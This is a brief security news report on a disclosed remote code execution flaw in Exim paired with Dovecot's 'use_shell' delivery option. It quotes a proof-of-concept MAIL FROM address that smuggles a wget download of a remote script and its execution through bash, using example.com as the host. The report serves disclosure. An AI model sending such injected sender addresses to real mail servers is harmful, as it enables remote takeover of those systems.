RedTeam Pentesting discovered a critical vulnerability in mail service Exim, which works with the Dovecot IMAP and POP3 server. A remote user can execute an arbitrary code on the server, if the work of the software has been configured, according to the recommendations on the wiki-project site.
To exploit the vulnerability hackers need to send an email with a specifically crafted sender address to a mail server. If Exim in tandem with Dovecot contains «use_shell» option the code placed in the address will be executed on the system.
The false configuration is found in many manuals for settings as the erroneous option was for the first time published on official website of Dovecot in 2009.
RedTeam Pentesting also provided an example of vulnerability exploitation. Providing the sender address «MAIL FROM: red`wget${IFS}-O${IFS}/tmp/p${IFS}example.com/test.sh``bash${IFS}/tmp/p`team@example.com» the mail server will execute the command «/bin/sh -c "/usr/lib/Dovecot/deliver -e -k -s -f \"red`wget${IFS}-O${IFS}/tmp/p${IFS}example.com/test.sh``bash${IFS}/tmp/p`team@example.com"» that leads to wget launch, as well as the execution of the external script from the site example.com/test.sh.
